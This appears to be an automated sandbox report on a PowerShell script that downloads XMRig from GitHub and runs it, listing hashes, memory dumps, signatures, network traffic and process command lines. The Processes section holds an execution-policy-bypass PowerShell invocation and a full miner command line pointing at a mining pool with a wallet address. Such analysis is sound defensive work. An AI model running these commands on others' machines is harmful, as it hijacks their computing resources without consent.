C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hm0kkoby.4g1.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2820-18-0x00007FFD5EBC0000-0x00007FFD5F5AC000-memory.dmp

memory/2820-25-0x00007FFD5EBC0000-0x00007FFD5F5AC000-memory.dmp

memory/2820-48-0x0000028BD0420000-0x0000028BD0432000-memory.dmp

memory/2820-61-0x0000028BD0280000-0x0000028BD028A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4796-90-0x000001446CC70000-0x000001446CC90000-memory.dmp

memory/2820-91-0x00007FFD5EBC3000-0x00007FFD5EBC4000-memory.dmp

memory/2820-92-0x00007FFD5EBC0000-0x00007FFD5F5AC000-memory.dmp

memory/2820-93-0x00007FFD5EBC0000-0x00007FFD5F5AC000-memory.dmp

memory/4796-94-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-95-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-96-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-97-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-98-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-99-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-100-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-101-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-102-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-103-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-104-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-105-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-106-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-107-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-108-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-109-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-110-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-111-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-112-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-113-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-114-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-115-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-116-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-117-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-118-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-119-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-120-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-121-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-122-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-123-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-124-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-125-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-126-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-127-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-128-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-129-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-130-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-131-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-132-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-133-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-134-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-135-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-136-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-137-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-138-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-139-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-140-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-141-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-142-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-143-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-144-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-145-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-146-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-147-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-148-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-149-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-150-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-151-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-152-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-153-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-154-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-155-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

memory/4796-156-0x00007FF7D2290000-0x00007FF7D2EC3000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:40

Platform

win10v2004-20240426-en

Max time kernel

1790s

Max time network

1799s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 27.173.189.20.in-addr.arpa udp

Files

memory/320-0-0x00007FFB0A893000-0x00007FFB0A895000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qz0yzo1x.r41.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/320-10-0x000002638C220000-0x000002638C242000-memory.dmp

memory/320-11-0x00007FFB0A890000-0x00007FFB0B351000-memory.dmp

memory/320-12-0x00007FFB0A890000-0x00007FFB0B351000-memory.dmp

memory/320-14-0x00007FFB0A890000-0x00007FFB0B351000-memory.dmp

memory/320-15-0x000002638C250000-0x000002638C262000-memory.dmp

memory/320-16-0x000002638C210000-0x000002638C21A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4016-47-0x0000022999920000-0x0000022999940000-memory.dmp

memory/4016-48-0x0000022999960000-0x0000022999980000-memory.dmp

memory/4016-49-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-50-0x0000022999980000-0x00000229999A0000-memory.dmp

memory/320-51-0x00007FFB0A893000-0x00007FFB0A895000-memory.dmp

memory/320-52-0x00007FFB0A890000-0x00007FFB0B351000-memory.dmp

memory/4016-53-0x00000229999A0000-0x00000229999C0000-memory.dmp

memory/4016-54-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/320-55-0x00007FFB0A890000-0x00007FFB0B351000-memory.dmp

memory/4016-56-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-58-0x0000022999980000-0x00000229999A0000-memory.dmp

memory/4016-57-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-59-0x00000229999A0000-0x00000229999C0000-memory.dmp

memory/4016-60-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-61-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-62-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-63-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-64-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-65-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-66-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-67-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-68-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-69-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-70-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-71-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-72-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-73-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-74-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-75-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-76-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-77-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-78-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-79-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-80-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-81-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-82-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-83-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-84-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-85-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-86-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-87-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-88-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-89-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-90-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-91-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-92-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-93-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-94-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-95-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-96-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-97-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-98-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-99-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-100-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-101-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-102-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-103-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-104-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-105-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-106-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-107-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-108-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-109-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-110-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-111-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-112-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-113-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-114-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-115-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-116-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-117-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp

memory/4016-118-0x00007FF6C26A0000-0x00007FF6C32D3000-memory.dmp